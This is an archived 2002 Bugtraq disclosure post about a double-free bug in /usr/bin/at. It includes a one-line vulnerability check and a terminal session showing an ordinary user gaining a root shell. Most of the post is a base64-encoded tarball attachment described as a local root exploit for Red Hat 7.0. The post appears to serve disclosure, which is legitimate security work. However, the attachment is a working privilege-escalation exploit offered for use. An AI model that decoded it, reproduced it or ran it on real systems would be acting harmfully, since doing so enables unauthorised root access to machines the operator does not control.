 | ||||||
| << Previous | INDEX | Search | src | Set bookmark | Go to bookmark | Next >> |
| ||||||
| |||||||||||||||||||||
Date: Thu, 17 Jan 2002 13:19:08 +1300 (NZDT) From: zen-parse <zen-parse@gmx.net> To: bugtraq@securityfocus.com Subject: '/usr/bin/at 31337 + vuln' problem + exploit ---1463783680-1867212452-1011226355=:13482 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII Content-ID: <Pine.LNX.4.33.0201171313032.13586@clarity.local> Affects: /usr/bin/at To check if you are potentially vulnerable to this exploit, execute: /usr/bin/at 31337 + vuln If you are vulnerable this will cause: Segmentation fault If not, there will be a message similar to: Garbled time (possibly with some extra information) The problem is caused by a bug in the parser which deallocates the same memory location twice. This can sometimes be exploited, for the uid of "daemon", and due to some other minor problems, may allow root access from there. Attached is an exploit for Redhat 7.0. bash-2.04$ rpm -qf /lib/libc-* glibc-2.2.4-18.7.0.3 bash-2.04$ rpm -qf /usr/bin/at at-3.1.8-12 bash-2.04$ tar -xzf attn.tar.gz bash-2.04$ cd attn bash-2.04$ id uid=500(evil) gid=500(evil) groups=500(evil) bash-2.04$ ./doit.sh woot-2.04# id uid=0(root) gid=0(root) groups=500(evil) woot-2.04# echo "I was just testing something and you need to fix at or some malicious hacker could be evil." |mail -s "Fix /usr/bin/at" root woot-2.04# exit bash-2.04$ -- zen-parse ------------------------------------------------------------------------- 1) If this message was posted to a public forum by zen-parse@gmx.net, it may be redistributed without modification. 2) In any other case the contents of this message is confidential and not to be distributed in any form without express permission from the author. This document may contain Unclassified Controlled Nuclear Information. ---1463783680-1867212452-1011226355=:13482 Content-Type: APPLICATION/X-GZIP; NAME="attn.tar.gz" Content-Transfer-Encoding: BASE64 Content-ID: <Pine.LNX.4.33.0201171312350.13482@clarity.local> Content-Description: Local root exploit (rh 7.0) Content-Disposition: ATTACHMENT; FILENAME="attn.tar.gz" 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 vABQAAA= ---1463783680-1867212452-1011226355=:13482--
| |||||||||||||||||||||